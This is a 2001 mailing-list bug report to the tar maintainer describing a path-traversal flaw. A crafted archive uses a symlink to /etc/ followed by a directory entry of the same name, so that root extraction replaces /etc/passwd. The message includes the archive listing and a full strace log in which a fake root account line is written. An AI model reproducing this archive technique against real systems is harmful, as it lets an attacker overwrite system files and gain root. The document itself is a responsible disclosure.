
Re: Security bug: tar allows to overwrite arbitrary file when extracting


From: Mikulas Patocka
Subject: Re: Security bug: tar allows to overwrite arbitrary file when extracting
Date: Thu, 28 Jun 2001 11:30:48 +0200 (CEST)

> > From: Mikulas Patocka <address@hidden>
> > Date: Mon, 25 Jun 2001 18:11:36 +0200 (CEST)
> > 
> > Is this security bug? Or is it intended behaviour?
> 
> It is a security bug, and it is not the intended behavior.
> I could not reproduce the bug under Solaris 8, though.
> Perhaps there is a difference in the way the Linux kernel works?
> Can you investigate this?

Listing the archive with `tar tvf xploit.tar` gives this result (note that `dir/` appears twice and that `dir/link` is first a symlink to `/etc/` and later a directory entry):

drwxr-xr-x root/root         0 2001-06-28 11:31:39 dir/
lrwxrwxrwx root/root         0 2001-06-28 11:31:39 dir/link -> /etc/
drwxr-xr-x root/root         0 2001-06-28 11:31:39 dir/
drwxr-xr-x root/root         0 2001-06-28 11:31:39 dir/link/
-rw-r--r-- root/root        37 2001-06-28 11:31:39 dir/link/passwd

Here is the output of `strace -o tr tar xvf xploit.tar`, run as root (`geteuid() = 0`). The relevant part is at the end: `symlink("/etc/", "dir/link")` succeeds, the later `dir/link/` directory member is accepted because `mkdir` returns EEXIST, and the `open("dir/link/passwd", O_WRONLY|O_CREAT|O_EXCL)` that then fails with EEXIST is followed by `unlink("dir/link/passwd")` and a second `open` — so the existing /etc/passwd is removed and replaced through the symlink; the O_EXCL check does not help because tar unlinks and retries.

Mikulas

execve("/bin/tar", ["tar", "xvf", "xploit.tar"], [/* 23 vars */]) = 0
brk(0)                                  = 0x80696f8
open("/etc/ld.so.preload", O_RDONLY)    = -1 ENOENT (No such file or directory)
open("/etc/ld.so.cache", O_RDONLY)      = 4
fstat(4, {st_mode=S_IFREG|0644, st_size=27021, ...}) = 0
mmap(0, 27021, PROT_READ, MAP_PRIVATE, 4, 0) = 0x4000b000
close(4)                                = 0
open("/lib/libc.so.6", O_RDONLY)        = 4
mmap(0, 4096, PROT_READ, MAP_PRIVATE, 4, 0) = 0x40012000
munmap(0x40012000, 4096)                = 0
mmap(0, 672904, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0x40012000
mprotect(0x400a4000, 74888, PROT_NONE)  = 0
mmap(0x400a4000, 28672, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 4, 
0x91000) = 0x400a4000
mmap(0x400ab000, 46216, PROT_READ|PROT_WRITE, 
MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x400ab000
close(4)                                = 0
munmap(0x4000b000, 27021)               = 0
personality(PER_LINUX)                  = 0
getpid()                                = 391
time(NULL)                              = 993720713
brk(0)                                  = 0x80696f8
brk(0x8069730)                          = 0x8069730
brk(0x806a000)                          = 0x806a000
sigaction(SIGCHLD, {SIG_DFL}, {SIG_DFL}) = 0
geteuid()                               = 0
umask(0)                                = 022
brk(0x806d000)                          = 0x806d000
open(0xbffffdd6, O_RDONLY)              = 4
fstat(4, {st_mode=S_IFREG|0644, st_size=10240, ...}) = 0
read(4, "dir/\0\0\0\0\0\0\0\0\0\0\0\0\0\0"..., 10240) = 10240
open("/etc/nsswitch.conf", O_RDONLY)    = 5
fstat(5, {st_mode=S_IFREG|0644, st_size=406, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 
0x4000b000
read(5, "# /etc/nsswitch.conf\n#\n# Examp"..., 4096) = 406
read(5, "", 4096)                       = 0
close(5)                                = 0
munmap(0x4000b000, 4096)                = 0
open("/etc/ld.so.cache", O_RDONLY)      = 5
fstat(5, {st_mode=S_IFREG|0644, st_size=27021, ...}) = 0
mmap(0, 27021, PROT_READ, MAP_PRIVATE, 5, 0) = 0x4000b000
close(5)                                = 0
open("/lib/libnss_compat.so.1", O_RDONLY) = 5
mmap(0, 4096, PROT_READ, MAP_PRIVATE, 5, 0) = 0x400b7000
munmap(0x400b7000, 4096)                = 0
mmap(0, 27436, PROT_READ|PROT_EXEC, MAP_PRIVATE, 5, 0) = 0x400b7000
mprotect(0x400bd000, 2860, PROT_NONE)   = 0
mmap(0x400bd000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 5, 0x5000) 
= 0x400bd000
close(5)                                = 0
open("/lib/libnsl.so.1", O_RDONLY)      = 5
mmap(0, 4096, PROT_READ, MAP_PRIVATE, 5, 0) = 0x400be000
munmap(0x400be000, 4096)                = 0
mmap(0, 22012, PROT_READ|PROT_EXEC, MAP_PRIVATE, 5, 0) = 0x400be000
mprotect(0x400c2000, 5628, PROT_NONE)   = 0
mmap(0x400c2000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 5, 0x3000) 
= 0x400c2000
close(5)                                = 0
open("/lib/libnss_files.so.1", O_RDONLY) = 5
mmap(0, 4096, PROT_READ, MAP_PRIVATE, 5, 0) = 0x400c4000
brk(0x806e000)                          = 0x806e000
munmap(0x400c4000, 4096)                = 0
mmap(0, 32544, PROT_READ|PROT_EXEC, MAP_PRIVATE, 5, 0) = 0x400c4000
mprotect(0x400cb000, 3872, PROT_NONE)   = 0
mmap(0x400cb000, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 5, 0x6000) 
= 0x400cb000
close(5)                                = 0
munmap(0x4000b000, 27021)               = 0
open("/etc/passwd", O_RDONLY)           = 5
fcntl(5, F_GETFD)                       = 0
fcntl(5, F_SETFD, FD_CLOEXEC)           = 0
fstat(5, {st_mode=S_IFREG|0644, st_size=1073, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 
0x4000b000
lseek(5, 0, SEEK_CUR)                   = 0
read(5, "root:x:0:0:Mikulas Patocka,,,,:/"..., 4096) = 1073
close(5)                                = 0
munmap(0x4000b000, 4096)                = 0
open("/etc/group", O_RDONLY)            = 5
fcntl(5, F_GETFD)                       = 0
fcntl(5, F_SETFD, FD_CLOEXEC)           = 0
fstat(5, {st_mode=S_IFREG|0644, st_size=655, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 
0x4000b000
lseek(5, 0, SEEK_CUR)                   = 0
read(5, "root::0:root\nbin::1:root,bin,da"..., 4096) = 655
close(5)                                = 0
munmap(0x4000b000, 4096)                = 0
fstat(1, {st_mode=S_IFCHR|0600, st_rdev=makedev(4, 2), ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 
0x4000b000
ioctl(1, TCGETS, {B38400 opost isig icanon echo ...}) = 0
write(1, "dir/\n", 5)                   = 5
mkdir("dir", 0755)                      = 0
write(1, "dir/link\n", 9)               = 9
symlink("/etc/", "dir/link")            = 0
write(1, "dir/\n", 5)                   = 5
utime("dir/", [101/06/28-11:31:53, 101/06/28-11:31:39]) = 0
chmod("dir/", 0755)                     = 0
chown("dir/", 0, 0)                     = 0
mkdir("dir", 0755)                      = -1 EEXIST (File exists)
rmdir("dir/")                           = -1 ENOTEMPTY (Directory not empty)
write(1, "dir/link/\n", 10)             = 10
mkdir("dir/link", 0755)                 = -1 EEXIST (File exists)
rmdir("dir/link/")                      = -1 ENOTEMPTY (Directory not empty)
write(1, "dir/link/passwd\n", 16)       = 16
open("dir/link/passwd", O_WRONLY|O_CREAT|O_EXCL, 0644) = -1 EEXIST (File exists)
rmdir("dir/link/passwd")                = -1 ENOTDIR (Not a directory)
unlink("dir/link/passwd")               = 0
open("dir/link/passwd", O_WRONLY|O_CREAT|O_EXCL, 0644) = 5
write(5, "r00t:0wn3d:0:0:31337 h4x0r:/:/bi"..., 37) = 37
close(5)                                = 0
utime("dir/link/passwd", [101/06/28-11:31:53, 101/06/28-11:31:39]) = 0
chown("dir/link/passwd", 0, 0)          = 0
close(4)                                = 0
close(1)                                = 0
munmap(0x4000b000, 4096)                = 0
_exit(0)                                = ?



